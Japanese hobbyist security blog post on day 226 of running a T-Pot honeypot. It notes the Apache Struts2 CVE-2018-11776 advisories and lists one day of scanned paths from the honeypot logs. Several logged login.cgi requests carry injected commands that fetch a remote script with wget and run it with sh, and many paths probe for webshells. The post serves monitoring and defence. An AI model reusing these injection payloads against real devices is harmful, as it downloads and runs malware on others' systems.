サイバーセキュリティはじめました

ハニーポット(T-POT)の検証や攻撃の実験など、サイバーセキュリティに関して少しずつ勉強しています。

【ハニーポットの検証】ハニーポット設置226日目 ~新たなRCE Apache Struts2の脆弱性~

ハニーポット(T-POT)

OWASP Nagoyaの大型ChapterMeeting、「OWASP Day 758 / 2018」の募集が開始されています。懇親会もありますので、ぜひ皆さんご参加ください!

owaspnagoya.connpass.com

owaspnagoya.connpass.com

 

 

さて、昨日、非常にやばそうなApache Struts2脆弱性(CVE-2018-11776)が見つかったとのニュースが発信され、話題になっていますね。

 

ハニーポットへの着信は、どのようになっているのでしょうか。

 

 

Apache Struts2脆弱性

昨日、タイトルの通り、Apache Struts2脆弱性(CVE-2018-11776)が見つかったとのニュースが発信されました。

今回の脆弱性は、条件はあるものの、RCE(Remote Code Execution:遠隔でのコード実行)が可能として注意が呼びかけられています。

Apache Struts2をご利用の方は、パッチの適用をご検討ください!

IPA

Apache Struts2 の脆弱性対策について(CVE-2018-11776)(S2-057):IPA 独立行政法人

情報処理推進機構

【JPCERT】

Apache Struts 2 の脆弱性 (S2-057) に関する注意喚起

【ニュースサイト】

【セキュリティ ニュース】「Apache Struts 2」に深刻な脆弱性 - 悪用容易で攻撃ツールなど出回るおそれも(1ページ目 / 全2ページ):Security NEXT

「Apache Struts 2」に重大な脆弱性、直ちに更新を - ITmedia エンタープライズ

「Apache Struts 2」にリモートコード実行を可能にする脆弱性--パッチの適用を - ZDNet Japan

「Apache Struts 2」の脆弱性を悪用した攻撃コードが出回る、早急に修正版へのアップデートを - INTERNET Watch

本日の攻撃状況

今週の攻撃状況 

【全ハニーポット

f:id:tk-secu:20180823224234p:plain

【Cowrieを除くハニーポット

f:id:tk-secu:20180823224303p:plain

一時期、Vnclowpotの件数が大きく伸びていますが、それ以外は特に大きな変動がありません。

 

本日の攻撃状況 

【全ハニーポット

f:id:tk-secu:20180823224505p:plain

【Cowrieを除くハニーポット

f:id:tk-secu:20180823224441p:plain

ちょうど今、honeytrapに攻撃を着信している状況のようですね。ログに落ちるまで、タイムラグがありますので、次回観測してみたいと思います。

 

WOWhoneypotyの攻撃状況

WOWHoneypotのログから、Apache Struts2脆弱性脆弱性をついた攻撃がないか、見れればいいなと思いましたが、まだ、情報が見つけることができず、攻撃があるのかどうかわかりませんでした。

しかし、1日で406件のリクエストと、決して少なくない回数の攻撃を受けていましたので、内容を公開したいと思います。

HTTPリクエス

/
/_query.php
/12.php
/1213.php
/3.php
/56.php
/9678.php
/admin/index.php
/admin/mysql/index.php
/admin/mysql2/index.php
/admin/phpMyAdmin/index.php
/admin/phpmyadmin/index.php
/admin/phpmyadmin2/index.php
/admin/PMA/index.php
/admin/pma/index.php
/ak.php
/ak47.php
/ak48.php
/angge.php
/aotu.php
/appserv.php
/aw.php
/bak.php
/cainiao.php
/ccvv
/claroline/phpMyAdmin/index.php
/cmd.php
/cmdd.php
/cmv.php
/cmx.php
/conflg.php
/data.php
/db.init.php
/db/index.php
/db__.init.php
/db_cts.php
/db_dataml.php
/db_desql.php
/db_pma.php
/db_session.init.php
/dbadmin/index.php
/defect.php
/desktop.ini.php
/fack.php
/feixiang.php
/h1.php
/hell.php
/help.php
/help-e.php
/hh.php
/hm.php
/index.php
/infoo.php
/ip.php
/java.php
/knal.php
/l7.php
/l8.php
/lala.php
/lala-dpr.php
/license.php
/lindex.php
/log.php
/login.cgi?cli=aa%20aa%27;wget%20http[:]//176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
/login.cgi?cli=aa%20aa%27;wget%20http[:]//209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
/login.cgi?cli=aa%20aa%27;wget%20http[:]//46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
/logon.php
/lol.php
/m.php?pbid=open
/min.php
/muhstik.php
/muhstik2.php
/muhstik-dpr.php
/muhstiks.php
/mx.php
/myadmin/index.php
/myadmin2/index.php
/mysql/index.php
/mysqladmin/index.php
/mysql-admin/index.php
/mz.php
/pe.php
/phpadmin/index.php
/phpinfi.php
/phpma/index.php
/phpMyAdmin.old/index.php
/phpMyAdmin/index.php
/phpmyadmin/index.php
/phpMyAdmin/phpMyAdmin/index.php
/phpmyadmin/phpmyadmin/index.php
/phpMyadmin_bak/index.php
/phpmyadmin0/index.php
/phpmyadmin1/index.php
/phpmyadmin2/index.php
/phpMyAdminold/index.php
/phpmyadmin-old/index.php
/phpstudy.php
/phpStudy.php
/PMA/index.php
/pma/index.php
/PMA2/index.php
/pmamy/index.php
/pmamy2/index.php
/pma-old/index.php
/pmd/index.php
/pmd_online.php
/post.php
/q.php
/qaq.php
/qq.php
/qwe.php
/robots.txt
/s.php
/sheep.php
/shell.php
/ssaa.php
/system.php
/test.php
/text.php
/tools/phpMyAdmin/index.php
/typo3/phpmyadmin/index.php
/uploader.php
/w.php
/wan.php
/wanan.php
/wc.php
/web/phpMyAdmin/index.php
/webdav/
/webslee.php
/weixiao.php
/wp-admins.php
/wp-config.php
/wpo.php
/wshell.php
/wuwu11.php
/www/phpMyAdmin/index.php
/x.php
/xampp/phpmyadmin/index.php
/xiao.php
/xiaoma.php
/xiaomae.php
/xiaomar.php
/xshell.php
/xw.php
/xw1.php
/xx.php
/yao.php
/yumo.php
/z.php
/zuo.php
/zuoshou.php
http[:]//180.163.113.82/check_proxy

 

HTTPSリクエス

 / 
/robots.txt

 

POSTリクエス

/12.php
/1213.php
/3.php
/56.php
/9678.php
/ak.php
/ak47.php
/ak48.php
/angge.php
/aotu.php
/aw.php
/bak.php
/cainiao.php
/cmd.php
/conflg.php
/data.php
/db.init.php
/db__.init.php
/db_dataml.php
/db_desql.php
/db_session.init.php
/defect.php
/fack.php
/feixiang.php
/h1.php
/hh.php
/hm.php
/infoo.php
/ip.php
/l7.php
/l8.php
/lindex.php
/log.php
/m.php?pbid=open
/min.php
/mx.php
/mz.php
/pe.php
/phpinfi.php
/phpstudy.php
/phpStudy.php
/post.php
/q.php
/qaq.php
/qq.php
/qwe.php
/s.php
/sheep.php
/ssaa.php
/system.php
/test.php
/w.php
/wan.php
/wanan.php
/wc.php
/webslee.php
/weixiao.php
/wp-admins.php
/wshell.php
/wuwu11.php
/xiao.php
/xiaoma.php
/xiaomae.php
/xiaomar.php
/xshell.php
/xw.php
/xw1.php
/xx.php
/yao.php
/yumo.php
/zuo.php
/zuoshou.php

 

まだまだリクエストの中身について、どれを除外すべきか判断できかねる状況ですが、本日1日分のログの状況となります。